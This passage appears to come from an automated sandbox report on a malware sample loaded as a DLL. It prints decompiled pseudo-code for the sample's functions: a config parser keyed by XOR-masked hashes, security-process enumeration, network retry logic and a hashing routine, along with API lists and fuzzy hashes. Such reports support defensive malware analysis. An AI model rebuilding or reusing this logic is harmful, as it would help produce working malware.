				signed int* _t16;
				signed int _t25;
				signed int _t26;
				signed int* _t28;
				signed int _t30;

				_t28 = __ecx;
				_t14 =  *0xd4d2c8; // 0x3289618
				_v12 = _t14;
				_t16 = _a12;
				_t30 = 8;
				if(_t16 != 0) {
					 *_t16 =  *_t16 & 0x00000000;
				}
				do {
					_t31 =  &_v68;
					if(E00D48C01( &_v68) == 0) {
						goto L16;
					}
					_t30 = E00D497F7(_t31, _a4, _v12);
					if(_t30 == 0) {
						_t25 = E00D45988(_t31, _t28); // executed
						_t30 = _t25;
						if(_t30 != 0) {
							if(_t30 == 0x102) {
								E00D4D000 = E00D4D000 + 0xea60;
							}
						} else {
							if(_v24 != 0xc8) {
								_t30 = 0xe8;
							} else {
								_t26 = _v20;
								if(_t26 == 0) {
									_t30 = 0x10d2;
								} else {
									_t28 = _a8;
									if(_t28 != 0) {
										_v60 = _v60 & _t30;
										 *_t28 = _v60;
										_t28 = _a12;
										if(_t28 != 0) {
											 *_t28 = _t26;
										}
									}
								}
							}
						}
					}
					E00D458DB( &_v68, 0x102, _t28, _t30);
					L16:
				} while (_t30 == 0x2f19 && WaitForSingleObject( *0xd4d26c, 0) == 0x102);
				return _t30;
			}

















                                0x00d4933a
                                0x00d49340
                                0x00d49347
                                0x00d4934f
                                0x00d49355
                                0x00d49358
                                0x00d4935a
                                0x00d4935a
                                0x00d49362
                                0x00d49362
                                0x00d4936c
                                0x00000000
                                0x00000000
                                0x00d4937b
                                0x00d4937f
                                0x00d49383
                                0x00d49388
                                0x00d4938c
                                0x00d493c8
                                0x00d493ca
                                0x00d493ca
                                0x00d4938e
                                0x00d49395
                                0x00d493bf
                                0x00d49397
                                0x00d49397
                                0x00d4939c
                                0x00d493b8
                                0x00d4939e
                                0x00d4939e
                                0x00d493a3
                                0x00d493a8
                                0x00d493ab
                                0x00d493ad
                                0x00d493b2
                                0x00d493b4
                                0x00d493b4
                                0x00d493b2
                                0x00d493a3
                                0x00d4939c
                                0x00d49395
                                0x00d4938c
                                0x00d493d7
                                0x00d493dc
                                0x00d493dc
                                0x00d49400

                                APIs
                                • WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74E481D0), ref: 00D493EC
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: ObjectSingleWait
                                • String ID:
                                • API String ID: 24740636-0
                                • Opcode ID: 7383cec8961d4e57d5ad3755020e4eee37db8442ceff49592bac02f8fb1c8891
                                • Instruction ID: fee85882891b7b92a57eef2d9f2cdeafb6e412e9c0412792e8a215de9609b5df
                                • Opcode Fuzzy Hash: 7383cec8961d4e57d5ad3755020e4eee37db8442ceff49592bac02f8fb1c8891
                                • Instruction Fuzzy Hash: 5C215E367002899BDF11DF5AD8A8A6FB7A6AB82364F194125E501E72D0DBB1DC41CB70
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D41037, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                Download Yara Rule
                                C-Code - Quality: 34%
                                			E00D41037(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0xd4d2a8; // 0x253a5a8
				_t4 = _t15 + 0xd4e39c; // 0x3288944
				_t20 = _t4;
				_t6 = _t15 + 0xd4e124; // 0x650047
				_t17 = E00D476E7(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E00D47EA4(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                                0x00d41041
                                0x00d41048
                                0x00d41049
                                0x00d4104a
                                0x00d4104b
                                0x00d41051
                                0x00d41056
                                0x00d41056
                                0x00d41060
                                0x00d41072
                                0x00d41079
                                0x00d410a7
                                0x00d4107b
                                0x00d4107d
                                0x00d41082
                                0x00d410a4
                                0x00d41084
                                0x00d41087
                                0x00d4108e
                                0x00d41093
                                0x00d41095
                                0x00d41095
                                0x00d4109a
                                0x00d4109a
                                0x00d41082
                                0x00d410ae

                                APIs
                                  • Part of subcall function 00D476E7: SysFreeString.OLEAUT32(?), ref: 00D477C6
                                  • Part of subcall function 00D47EA4: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00D451D4,004F0053,00000000,?), ref: 00D47EAD
                                  • Part of subcall function 00D47EA4: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00D451D4,004F0053,00000000,?), ref: 00D47ED7
                                  • Part of subcall function 00D47EA4: memset.NTDLL ref: 00D47EEB
                                • SysFreeString.OLEAUT32(00000000), ref: 00D4109A
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: FreeString$lstrlenmemcpymemset
                                • String ID:
                                • API String ID: 397948122-0
                                • Opcode ID: 3a48d5a558bfc9225dfdcf8cacbb40b5000d4a568cb3f5829a53b7c184db06d9
                                • Instruction ID: 370781b9736ebf4c1ac5a804c004785684758394169eb1ad68b511446c20e911
                                • Opcode Fuzzy Hash: 3a48d5a558bfc9225dfdcf8cacbb40b5000d4a568cb3f5829a53b7c184db06d9
                                • Instruction Fuzzy Hash: EE017C36900159BFDB529FA9CC04EAABBB9FB05350F004565F900E7161E771DD95C7B0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 1000196B, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                Download Yara Rule
                                C-Code - Quality: 37%
                                			E1000196B(void* __eax, intOrPtr _a4) {

				 *0x10004150 =  *0x10004150 & 0x00000000;
				_push(0);
				_push(0x1000414c);
				_push(1);
				_push(_a4);
				 *0x10004148 = 0xc; // executed
				L10002010(); // executed
				return __eax;
			}



                                0x1000196b
                                0x10001972
                                0x10001974
                                0x10001979
                                0x1000197b
                                0x1000197f
                                0x10001989
                                0x1000198e

                                APIs
                                • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(100016C7,00000001,1000414C,00000000), ref: 10001989
                                Memory Dump Source
                                • Source File: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.797669903.0000000010005000.00000040.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: DescriptorSecurity$ConvertString
                                • String ID:
                                • API String ID: 3907675253-0
                                • Opcode ID: 1993c95c5950e5545ff5e0ff84ea07d39106e86980e244a61008a792b8d983ba
                                • Instruction ID: 282e5bb9558e7c36415e3b38fee0fcfa39ed5af610658c9955217df824f70e77
                                • Opcode Fuzzy Hash: 1993c95c5950e5545ff5e0ff84ea07d39106e86980e244a61008a792b8d983ba
                                • Instruction Fuzzy Hash: EBC04CF8140750A7F620DB408C85FC57A51B7A4785F120504F650251E9CBB510D4951D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                Function 00D47FBE, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 258memoryCOMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 96%
                                			E00D47FBE(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t103;
				intOrPtr _t121;

				_t104 = __ecx;
				_t28 =  *0xd4d2a4; // 0x69b25f44
				if(E00D46247( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x90) {
					 *0xd4d2d8 = _v8;
				}
				_t33 =  *0xd4d2a4; // 0x69b25f44
				if(E00D46247( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0xd4d2a4; // 0x69b25f44
				if(E00D46247( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0xd4d238, 0, _v16);
					goto L69;
				} else {
					_t103 = _v12;
					if(_t103 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0xd4d2a4; // 0x69b25f44
						_t45 = E00D49403(_t104, _t103, _t98 ^ 0x7895433b);
					}
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0xd4d240 = _v8;
						}
					}
					if(_t103 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0xd4d2a4; // 0x69b25f44
						_t46 = E00D49403(_t104, _t103, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0xd4d244 = _v8;
						}
					}
					if(_t103 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0xd4d2a4; // 0x69b25f44
						_t47 = E00D49403(_t104, _t103, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0xd4d248 = _v8;
						}
					}
					if(_t103 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0xd4d2a4; // 0x69b25f44
						_t48 = E00D49403(_t104, _t103, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0xd4d004 = _v8;
						}
					}
					if(_t103 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0xd4d2a4; // 0x69b25f44
						_t49 = E00D49403(_t104, _t103, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0xd4d02c = _v8;
						}
					}
					if(_t103 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0xd4d2a4; // 0x69b25f44
						_t50 = E00D49403(_t104, _t103, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0xd4d24c = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t103 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0xd4d2a4; // 0x69b25f44
								_t51 = E00D49403(_t104, _t103, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E00D4A0FD(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E00D49FF6();
								}
							}
							if(_t103 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0xd4d2a4; // 0x69b25f44
								_t52 = E00D49403(_t104, _t103, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E00D4A0FD(0, _t52) != 0) {
								_t121 =  *0xd4d32c; // 0x32895b0
								E00D41128(_t121 + 4, _t68);
							}
							if(_t103 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0xd4d2a4; // 0x69b25f44
								_t53 = E00D49403(_t104, _t103, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0xd4d2a8; // 0x253a5a8
								_t22 = _t54 + 0xd4e252; // 0x616d692f
								 *0xd4d2d4 = _t22;
								goto L60;
							} else {
								_t64 = E00D4A0FD(0, _t53);
								 *0xd4d2d4 = _t64;
								if(_t64 != 0) {
									L60:
									if(_t103 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0xd4d2a4; // 0x69b25f44
										_t56 = E00D49403(_t104, _t103, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0xd4d2a8; // 0x253a5a8
										_t23 = _t57 + 0xd4e791; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E00D4A0FD(0, _t56);
									}
									 *0xd4d340 = _t58;
									HeapFree( *0xd4d238, 0, _t103);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}






































                                0x00d47fbe
                                0x00d47fc1
                                0x00d47fe1
                                0x00d47fef
                                0x00d47fef
                                0x00d47ff4
                                0x00d4800e
                                0x00d48276
                                0x00d4827d
                                0x00d48284
                                0x00d48284
                                0x00d48014
                                0x00d48030
                                0x00d48264
                                0x00d4826e
                                0x00000000
                                0x00d48036
                                0x00d48036
                                0x00d4803b
                                0x00d48051
                                0x00d4803d
                                0x00d4803d
                                0x00d4804a
                                0x00d4804a
                                0x00d4805b
                                0x00d4805d
                                0x00d48067
                                0x00d4806c
                                0x00d4806c
                                0x00d48067
                                0x00d48073
                                0x00d48089
                                0x00d48075
                                0x00d48075
                                0x00d48082
                                0x00d48082
                                0x00d4808d
                                0x00d4808f
                                0x00d48099
                                0x00d4809e
                                0x00d4809e
                                0x00d48099
                                0x00d480a5
                                0x00d480bb
                                0x00d480a7
                                0x00d480a7
                                0x00d480b4
                                0x00d480b4
                                0x00d480bf
                                0x00d480c1
                                0x00d480cb
                                0x00d480d0
                                0x00d480d0
                                0x00d480cb
                                0x00d480d7
                                0x00d480ed
                                0x00d480d9
                                0x00d480d9
                                0x00d480e6
                                0x00d480e6
                                0x00d480f1
                                0x00d480f3
                                0x00d480fd
                                0x00d48102
                                0x00d48102
                                0x00d480fd
                                0x00d48109
                                0x00d4811f
                                0x00d4810b
                                0x00d4810b
                                0x00d48118
                                0x00d48118
                                0x00d48123
                                0x00d48125
                                0x00d4812f
                                0x00d48134
                                0x00d48134
                                0x00d4812f
                                0x00d4813b
                                0x00d48151
                                0x00d4813d
                                0x00d4813d
                                0x00d4814a
                                0x00d4814a
                                0x00d48155
                                0x00d48168
                                0x00d48168
                                0x00000000
                                0x00d48157
                                0x00d48157
                                0x00d48161
                                0x00000000
                                0x00d48172
                                0x00d48172
                                0x00d48174
                                0x00d4818a
                                0x00d48176
                                0x00d48176
                                0x00d48183
                                0x00d48183
                                0x00d4818e
                                0x00d48190
                                0x00d48193
                                0x00d48194
                                0x00d4819b
                                0x00d4819d
                                0x00d4819e
                                0x00d4819e
                                0x00d4819b
                                0x00d481a5
                                0x00d481bb
                                0x00d481a7
                                0x00d481a7
                                0x00d481b4
                                0x00d481b4
                                0x00d481bf
                                0x00d481cd
                                0x00d481d7
                                0x00d481d7
                                0x00d481de
                                0x00d481f4
                                0x00d481e0
                                0x00d481e0
                                0x00d481ed
                                0x00d481ed
                                0x00d481f8
                                0x00d4820b
                                0x00d4820b
                                0x00d48210
                                0x00d48216
                                0x00000000
                                0x00d481fa
                                0x00d481fd
                                0x00d48202
                                0x00d48209
                                0x00d4821b
                                0x00d4821d
                                0x00d48233
                                0x00d4821f
                                0x00d4821f
                                0x00d4822c
                                0x00d4822c
                                0x00d48237
                                0x00d48243
                                0x00d48248
                                0x00d48248
                                0x00d48239
                                0x00d4823c
                                0x00d4823c
                                0x00d48256
                                0x00d4825b
                                0x00d48261
                                0x00000000
                                0x00d48261
                                0x00000000
                                0x00d48209
                                0x00d481f8
                                0x00d48161
                                0x00d48155

                                APIs
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,00D430F3,?,69B25F44,?,00D430F3,69B25F44,?,00D430F3,69B25F44,00000005,00D4D00C,00000008), ref: 00D48063
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,00D430F3,?,69B25F44,?,00D430F3,69B25F44,?,00D430F3,69B25F44,00000005,00D4D00C,00000008), ref: 00D48095
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,00D430F3,?,69B25F44,?,00D430F3,69B25F44,?,00D430F3,69B25F44,00000005,00D4D00C,00000008), ref: 00D480C7
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,00D430F3,?,69B25F44,?,00D430F3,69B25F44,?,00D430F3,69B25F44,00000005,00D4D00C,00000008), ref: 00D480F9
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,00D430F3,?,69B25F44,?,00D430F3,69B25F44,?,00D430F3,69B25F44,00000005,00D4D00C,00000008), ref: 00D4812B
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,00D430F3,?,69B25F44,?,00D430F3,69B25F44,?,00D430F3,69B25F44,00000005,00D4D00C,00000008), ref: 00D4815D
                                • HeapFree.KERNEL32(00000000,00D430F3,00D430F3,?,69B25F44,?,00D430F3,69B25F44,?,00D430F3,69B25F44,00000005,00D4D00C,00000008,?,00D430F3), ref: 00D4825B
                                • HeapFree.KERNEL32(00000000,?,00D430F3,?,69B25F44,?,00D430F3,69B25F44,?,00D430F3,69B25F44,00000005,00D4D00C,00000008,?,00D430F3), ref: 00D4826E
                                  • Part of subcall function 00D4A0FD: lstrlen.KERNEL32(69B25F44,00000000,7673D3B0,00D430F3,00D48241,00000000,00D430F3,?,69B25F44,?,00D430F3,69B25F44,?,00D430F3,69B25F44,00000005), ref: 00D4A106
                                  • Part of subcall function 00D4A0FD: memcpy.NTDLL(00000000,?,00000000,00000001,?,00D430F3), ref: 00D4A129
                                  • Part of subcall function 00D4A0FD: memset.NTDLL ref: 00D4A138
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: FreeHeap$lstrlenmemcpymemset
                                • String ID: Ut
                                • API String ID: 3442150357-8415677
                                • Opcode ID: 65bd29188c89d3f3dde99af875cf11ad41e69f002adca64800d27b3489aa4d0e
                                • Instruction ID: 5784c58ef8dc62bf659a0a823f240bae0c6517ab77a87ec729a0f8750fdee050
                                • Opcode Fuzzy Hash: 65bd29188c89d3f3dde99af875cf11ad41e69f002adca64800d27b3489aa4d0e
                                • Instruction Fuzzy Hash: 3D817F78A10704AFCB10EFB8CDC496F76AEEB49780B280926E405D7315EE75D946A734
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 10001EE5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E10001EE5() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x10004130;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x1000413c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x1000412c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x10004128 = _t5;
						 *0x10004130 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x10004124 = _t6;
						if(_t6 == 0) {
							 *0x10004124 =  *0x10004124 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}










                                0x10001ee6
                                0x10001ef4
                                0x10001efa
                                0x10001f01
                                0x10001f58
                                0x10001f58
                                0x10001f03
                                0x10001f0b
                                0x10001f18
                                0x10001f18
                                0x10001f54
                                0x10001f56
                                0x00000000
                                0x00000000
                                0x00000000
                                0x10001f0d
                                0x10001f14
                                0x10001f1a
                                0x10001f1a
                                0x10001f1f
                                0x10001f2d
                                0x10001f32
                                0x10001f38
                                0x10001f3e
                                0x10001f45
                                0x10001f47
                                0x10001f47
                                0x10001f51
                                0x10001f16
                                0x10001f16
                                0x00000000
                                0x10001f16
                                0x10001f14

                                APIs
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,1000154B), ref: 10001EF4
                                • GetVersion.KERNEL32 ref: 10001F03
                                • GetCurrentProcessId.KERNEL32 ref: 10001F1F
                                • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 10001F38
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.797669903.0000000010005000.00000040.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CreateCurrentEventOpenVersion
                                • String ID: @Mt MtTt
                                • API String ID: 845504543-608512568
                                • Opcode ID: 71d23d898772f397a204b1a7459d48f648326283fe838bef3ee78d2eb13f1070
                                • Instruction ID: ea10dc5c802a680a8ba8bb0f8edc734978800e41233c6741bbe9ab65d3b2f1fa
                                • Opcode Fuzzy Hash: 71d23d898772f397a204b1a7459d48f648326283fe838bef3ee78d2eb13f1070
                                • Instruction Fuzzy Hash: 77F0C2B0641332DBF7019F68AD9A7D63BE4E7097D2F028125F641C61ECDBB084918B5C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D48F1B, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                Download Yara Rule
                                C-Code - Quality: 68%
                                			E00D48F1B() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0xd4d2a8; // 0x253a5a8
						_t2 = _t9 + 0xd4ee34; // 0x73617661
						_push( &_v264);
						if( *0xd4d0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                                0x00d48f26
                                0x00d48f30
                                0x00d48f34
                                0x00d48f3e
                                0x00d48f6f
                                0x00d48f45
                                0x00d48f4a
                                0x00d48f57
                                0x00d48f60
                                0x00d48f77
                                0x00d48f62
                                0x00d48f6a
                                0x00000000
                                0x00d48f6a
                                0x00d48f78
                                0x00d48f79
                                0x00000000
                                0x00d48f79
                                0x00000000
                                0x00d48f73
                                0x00d48f7f
                                0x00d48f84

                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00D48F2B
                                • Process32First.KERNEL32(00000000,?), ref: 00D48F3E
                                • Process32Next.KERNEL32(00000000,?), ref: 00D48F6A
                                • CloseHandle.KERNEL32(00000000), ref: 00D48F79
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID:
                                • API String ID: 420147892-0
                                • Opcode ID: 8c7fc040277b226b0986dc1a9722d30bdf0043fa810ade4ad1e2645cb82f7950
                                • Instruction ID: bf3e5e571abe7d27ce4a7da58b82999492d2cd5c3d56e3a4ec2dc3775b61af86
                                • Opcode Fuzzy Hash: 8c7fc040277b226b0986dc1a9722d30bdf0043fa810ade4ad1e2645cb82f7950
                                • Instruction Fuzzy Hash: D8F0B4366012286BEB20BB668C49DEFB7AEDFC6750F040161F945E3105EE30DA4996B5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00910725, Relevance: 2.7, Strings: 2, Instructions: 224COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.795811026.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_910000_loaddll32.jbxd
                                Similarity
                                • API ID:
                                • String ID: t32c$t32c
                                • API String ID: 0-1046649395
                                • Opcode ID: 0c853d85831891ca95221df78244bfe9110112b610d694c0f5ca411909319447
                                • Instruction ID: d1c0d48357668c8d0d9e64de2a26eefd8d01bb3bfd1e2a0526d55043e2e43588
                                • Opcode Fuzzy Hash: 0c853d85831891ca95221df78244bfe9110112b610d694c0f5ca411909319447
                                • Instruction Fuzzy Hash: C1815736A0021ADFDF24CF50DD84BA9B7B9FF88324F198595D8096B216D371AEC5DB40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D4836E, Relevance: 1.9, APIs: 1, Instructions: 611COMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 49%
                                			E00D4836E(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t338;
				signed char* _t348;
				signed int _t349;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t365;
				signed int _t367;
				signed int _t376;
				signed int _t378;
				signed int _t380;
				signed int _t382;
				signed int _t384;
				intOrPtr* _t400;
				signed int* _t401;
				signed int _t402;
				signed int _t404;
				signed int _t406;
				signed int _t408;
				signed int _t410;
				signed int _t412;
				signed int _t414;
				signed int _t416;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t424;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t438;
				signed int _t440;
				signed int _t508;
				signed int _t599;
				signed int _t607;
				signed int _t613;
				signed int _t679;
				void* _t682;
				signed int _t683;
				signed int _t685;
				signed int _t690;
				signed int _t692;
				signed int _t697;
				signed int _t699;
				signed int _t718;
				signed int _t720;
				signed int _t722;
				signed int _t724;
				signed int _t726;
				signed int _t728;
				signed int _t734;
				signed int _t740;
				signed int _t742;
				signed int _t744;
				signed int _t746;
				signed int _t748;

				_t226 = _a4;
				_t348 = __ecx + 2;
				_t401 =  &_v76;
				_t682 = 0x10;
				do {
					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
					_t401 =  &(_t401[1]);
					_t348 =  &(_t348[4]);
					_t682 = _t682 - 1;
				} while (_t682 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t683 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t402 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t349 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
				asm("rol ecx, 0xc");
				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
				asm("ror esi, 0xa");
